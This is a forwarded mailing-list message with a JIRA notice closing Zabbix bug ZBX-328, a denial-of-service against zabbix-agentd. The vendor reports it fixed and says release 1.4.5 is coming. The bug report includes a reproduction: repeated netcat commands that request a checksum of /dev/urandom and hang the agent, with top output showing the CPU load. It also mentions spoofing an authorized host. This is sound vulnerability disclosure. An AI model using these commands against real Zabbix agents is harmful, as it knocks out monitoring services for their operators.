hi, see upstreams response.
----- Forwarded message from "Alexei Vladishev (ZABBIX Support)" <[EMAIL PROTECTED]> ----- From: "Alexei Vladishev (ZABBIX Support)" <[EMAIL PROTECTED]> Date: Tue, 25 Mar 2008 16:31:18 +0200 (EET) To: [EMAIL PROTECTED] Subject: [ZABBIX] Closed: (ZBX-328) Possible DoS against zabbix-agentd [ https://support.zabbix.com/browse/ZBX-328?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Alexei Vladishev closed ZBX-328. -------------------------------- Resolution: Fixed The problem was fixed a couple of months ago. Please wait for 1.4.5. It will be released this week. Alexei > Possible DoS against zabbix-agentd > ---------------------------------- > > Key: ZBX-328 > URL: https://support.zabbix.com/browse/ZBX-328 > Project: ZABBIX > Issue Type: Bug > Components: Agent (Unix) > Environment: Debian etch, kernel 2.6.18, Intel(R) Pentium(R) 4 CPU > 2.80GHz > Reporter: Milen Rangelov > Assignee: Alexei Vladishev > > An authorized host can cause the zabbix_agentd to hang, overconsuming CPU > resources. > This can be triggered by sending the agent a file checksum request > (vfs.file.cksum[file]) with file argument being some "special" device file > like /dev/zero or /dev/urandom (the latter rises kernel CPU usage even more). > If the malicious user sends <number_of_zabbix_agentd_children> requests, then > the zabbix_agentd service will not be able to serve any requests until it's > restarted. > Here's some example session : > ------------ > gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 > & > [1] 24429 > gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 > & > [2] 24431 > gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 > & > [3] 24433 > gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 > & > [4] 24435 > ...and some output from top: > <snip> > Tasks: 183 total, 5 running, 178 sleeping, 0 stopped, 0 zombie > Cpu(s): 2.0%us, 97.0%sy, 1.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st > <snip> > PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND > 24381 zabbix 30 5 5056 1032 768 R 65 0.1 4:16.01 zabbix_agentd > 24382 zabbix 30 5 5068 1044 776 R 50 0.1 4:12.18 zabbix_agentd > 24380 zabbix 30 5 5068 1044 776 R 50 0.1 4:01.24 zabbix_agentd > 24379 zabbix 30 5 5056 1036 772 R 31 0.1 4:08.24 zabbix_agentd > ------------------------ > zabbix_agentd accepts new connections, but does not serve them. > The malicious user needs to connect from an authorized host, but it's not so > hard to spoof it if he's on the same ethernet segment as the host running the > zabbix_agent. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: https://support.zabbix.com/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira ----- End forwarded message ----- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]